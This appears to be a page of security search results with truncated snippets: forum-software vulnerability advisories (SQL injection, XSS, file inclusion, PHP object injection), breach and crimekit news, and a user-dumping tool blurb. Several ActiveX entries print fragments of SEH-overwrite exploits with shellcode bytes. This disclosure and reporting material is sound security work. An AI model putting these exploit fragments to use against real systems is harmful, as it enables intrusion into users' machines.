1491 matches found
Snitz Forums 2000 3.4.6 Pop_Mail.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20712/info Snitz Forums 2000 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability
No description provided by source. WWW.SecurityWall.orG Quicksilver Forums v1.2.0+1.2.1 setincludepath Remote File Inclusion Vulnerabilities Author: mdx Class : Remote cont@ct: bilkopatathotmaildotcom v1.2.0+v1.2.1 Code: activeutil.php? requireonce $set'includepath' . '/lib/bbcode.php'; Exploit:...
Snitz Forums 2000 Register.ASP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7549/info Snitz Forums 2000 is ASP-based web forum software. It runs on Microsoft Windows operating systems. Snitz is back-ended by a database and supports Microsoft Access 97/2000, SQL Server 6.5/7.0/2000 and MySQL. It i...
Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20004/info Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. This could allow an attacker to steal cookie-based authentication credentials and...
Snitz Forums 2000 3.4.5/3.4.6 Multiple Cross-Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/27162/info Snitz Forums 2000 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in t...
AoA MP4 Converter ActiveX
Exploit for windows platform in category local exploits Exploit Title: AoA MP4 Converter ActiveX Date: 19.05.2014 Author:metacom Website: www.rstforums.com Software Link: www.aoamedia.com/AoAMP4Converter.exe Version: 4.1.2 Tested on: Windows xp sp3EN IE 6.0 nse="\xEB\x06\x90\x90";...
AoA DVD Creator 2.6.2 - ActiveX
nseh="\xEB\x06\x90\x90"; seh="\x1f\x5c\x03\x10"; nops="\x90"; while nops.length10 nops+="\x90"; shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+...
AoA Audio Extractor Basic 2.3.7 - ActiveX
nse="\xEB\x06\xff\xff"; seh="\x58\xE4\x04\x10"; nops="\x90"; while nops.length10 nops+="\x90"; shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+...
Why Full Disclosure Still Matters
When the venerable Full Disclosure security mailing list shut down abruptly last month, many in the security community were surprised. But a lot of people, even those who had been members of the list for a long time, greeted the news with a shrug. Twitter, blogs and other outlets had obviated the...
[Dumb0] A simple tool to dump users in popular forums and CMS
A simple tool to dump users forums popular forums and CMS like: WordPress SMF vBulletin IP Board XEN forums myBB useBB vanilla bbPress etc... Download Dumb0...
Learn How DuckDuckGo Search Engine helps you to be a Good Programmer
So you want to be a Programmer? Want to learn - How to code, Debug, and Program? The Web is full of free resources that can turn you into a programmer in no time, but never knew Where to start or How to troubleshoot your programs. Learning How to be a good programmer begins with learning logic...
List of 8,000 FTP Credentials for Sale in Underground Forums
Hackers are targeting FTP upload sites with the hopes of redirecting victims to spam or even infecting webservers that rely on FTP applications for updates. Hold Security reported yesterday it had secured a list of credentials for close to 7,800 FTP sites being circulated in cybercrime forums. Th...
OpenSUSE Forums Hacked, User Email Addresses Compromised
The forums for the Linux-based operating system openSUSE remain down today and for the foreseeable future following a hack earlier this week that appears to have compromised some of its users’ email addresses. OpenSUSE claims the hacker was able to exploit a vulnerability in the forum’s software,...
Atrax Kit Boasts Tor Connectivity, Bitcoin Extraction
Yet another commercial crimekit has been spotted making the rounds on the underground malware forums that uses the anonymity network Tor to stealthily communicate with its command and control servers. While it isn’t the first of its kind to use Tor, the kit, nicknamed Atrax, is cheap and comes wi...
MacRumors Forums Hacked, Passwords Stolen
The hacker behind the MacRumors Forums breach said the attack was “friendly” and that none of the data accessed will be leaked. Editorial Director Arnold Kim confirmed to Threatpost that a post on the forums from the hacker is legitimate. Kim posted an advisory on the forum on Monday informing...
millions stolen in Bitcoin heist
More trouble for Bitcoin this week after an Australian wallet service admitted that attackers broke into their systems and made off with more than $1.2 million worth of the the digital crypto-currency. The theft comes on the coat-tails of a contentious research paper claiming that a...
Vanilla Forums 2.0 < 2.0.18.5 - 'class.utilitycontroller.php' PHP Object Injection
------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize them & save them if necessary 327. $Messages = GdnFormat::Unserialize$Messages;...
Vanilla Forums 2.0 2.0.18.5 - class.utilitycontroller.php PHP Object Injection
Vanilla Forums 2.0 2.0.18.5 - class.utilitycontroller.php PHP Object Injection ------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize...
Vanilla Forums 2.0 - 2.0.18.5 PHP Object Injection Vulnerability
Exploit for php platform in category web applications ------------------------------------------------------------------------------------------- Vanilla Forums ValidateTransientKey$TransientKey 324. // If messages wasn't empty 325. if $Messages != '' 326. // Unserialize them & save them if...
[KIS-2013-09] Vanilla Forums <= 2.0.18.5 (class.utilitycontroller.php) PHP Object Injection Vulnerability
------------------------------------------------------------------------------------------- Vanilla Forums = 2.0.18.5 class.utilitycontroller.php PHP Object Injection Vulnerability ------------------------------------------------------------------------------------------- - Software Link:...